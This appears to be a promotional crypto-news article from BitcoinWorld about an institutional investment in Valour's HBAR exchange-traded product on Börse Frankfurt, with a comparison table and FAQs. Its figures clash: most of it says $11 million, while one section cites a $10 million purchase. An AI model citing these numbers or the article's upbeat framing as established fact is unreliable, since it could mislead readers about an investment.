Expert Analysis on Institutional Crypto Adoption

Financial analysts view this investment as part of a broader trend. “Institutional capital seeks regulated, transparent entry points,” notes a report from Bloomberg Intelligence. “Listed ETPs on major exchanges like Frankfurt meet this demand perfectly.” The European market has been particularly receptive to crypto ETPs. Products tracking Bitcoin and Ethereum have seen consistent inflows since 2020. The success of the Valour HBAR ETP now expands this trend to alternative layer-1 protocols.

Data from CryptoCompare shows ETP assets under management (AUM) growing steadily. European products often feature physically-backed structures. This means the issuer holds the actual cryptocurrency for each share. This structure contrasts with futures-based products common in the United States. Physical backing can reduce tracking error and counterparty risk. Consequently, it appeals to long-term, value-oriented institutional portfolios.

The Strategic Role of DeFi Technologies and Valour

Valour operates as a key subsidiary of DeFi Technologies Inc., a publicly traded company. DeFi Technologies focuses on bridging decentralized finance with traditional capital markets. The company’s strategy involves creating, managing, and offering digital asset investment products. Valour’s product suite includes ETPs for Bitcoin, Ethereum, Cardano, and now prominently, Hedera. Each product provides a simple, secure, and accessible investment pathway.

Key advantages of the Valour ETP structure include:

- Regulatory Compliance: Full adherence to EU financial regulations.
- Custody Security: Assets held with regulated, institutional-grade custodians.
- Exchange Access: Trading through conventional brokerage accounts.
- Transparent Pricing: Real-time NAV calculation and public reporting.

This infrastructure lowers the barrier to entry for pension funds, asset managers, and family offices. It transforms a digital asset into a recognizable security. The $11 million investment validates this business model’s effectiveness. It also suggests strong investor appetite for diversified crypto exposure beyond the largest two assets.

Market Impact and Future Trajectory for HBAR

The immediate market impact provides a tangible demand signal. A single $10 million purchase represents significant volume for the ETP. It directly increases the product’s assets under management. This growth enhances liquidity and tightens bid-ask spreads. Over time, sustained institutional interest can contribute to price discovery and stability for the underlying HBAR token. Moreover, it encourages other asset managers to consider similar products.

The investment timeline coincides with broader developments in the Hedera ecosystem. Recent network upgrades have improved smart contract functionality. Furthermore, stablecoin issuers are exploring the network for its low-cost settlement. These technical and fundamental improvements create a compelling investment thesis. Institutional capital often acts on such multi-factor analyses rather than short-term momentum.

Comparative Overview of European Crypto ETP Listings

Asset | Primary Exchange | Issuer | Product Type
Bitcoin (BTC) | Börse Frankfurt, SIX | Multiple | Physically-backed ETP
Ethereum (ETH) | Börse Frankfurt, SIX | 21Shares, Valour | Physically-backed ETP
Hedera (HBAR) | Börse Frankfurt | Valour | Physically-backed ETP
Cardano (ADA) | Börse Frankfurt | Valour | Physically-backed ETP

This table illustrates Hedera’s position among other major digital assets with regulated European listings. The presence on a major exchange like Frankfurt is a key milestone. It often precedes wider adoption by larger, more conservative financial institutions.

Conclusion

The $11 million institutional investment into the Valour HBAR ETP marks a definitive step forward. It validates Hedera Hashgraph’s enterprise-focused approach within the traditional financial system. The capital deployment through the regulated framework of the Börse Frankfurt underscores a maturation in crypto investment channels. This development likely signals continued institutional exploration of alternative layer-1 blockchain assets. Ultimately, the success of the Valour HBAR ETP strengthens the bridge between innovative distributed ledger technology and the global institutional capital landscape.

FAQs

Q1: What is the Valour HBAR ETP?
The Valour HBAR ETP is an Exchange Traded Product that tracks the price of Hedera’s HBAR cryptocurrency. It is listed on the Börse Frankfurt (Frankfurt Stock Exchange), allowing investors to gain exposure to HBAR through a traditional, regulated security without managing private keys.

Q2: Who made the $11 million investment?
Valour, the issuer, has not disclosed the specific institutional investor(s) behind the $11 million capital inflow. The announcement states the investment is institutional in nature, which typically refers to entities like asset managers, hedge funds, pension funds, or family offices.

Q3: How does this investment benefit HBAR?
The investment increases direct demand for HBAR, as the ETP is physically backed, meaning Valour purchases and holds the underlying tokens. It also enhances the ETP’s liquidity and credibility, potentially attracting more investors and integrating HBAR deeper into the traditional financial system.

Q4: What is the difference between an ETP and buying HBAR directly?
Buying the ETP involves purchasing a security on a stock exchange through a brokerage account. It offers regulatory protection, eliminates self-custody risks, and simplifies tax reporting. Buying HBAR directly requires using a cryptocurrency exchange and managing a private wallet, offering more control but also more responsibility.

Q5: Is the Valour HBAR ETP available to retail investors?
Yes. While the $11 million investment was institutional, the Valour HBAR ETP is a publicly listed security. Any investor with access to a broker that supports trading on the Börse Frankfurt or Sweden’s Spotlight Exchange can purchase shares of the ETP.

This post Valour HBAR ETP Secures Monumental $11M Institutional Investment on Frankfurt Exchange first appeared on BitcoinWorld.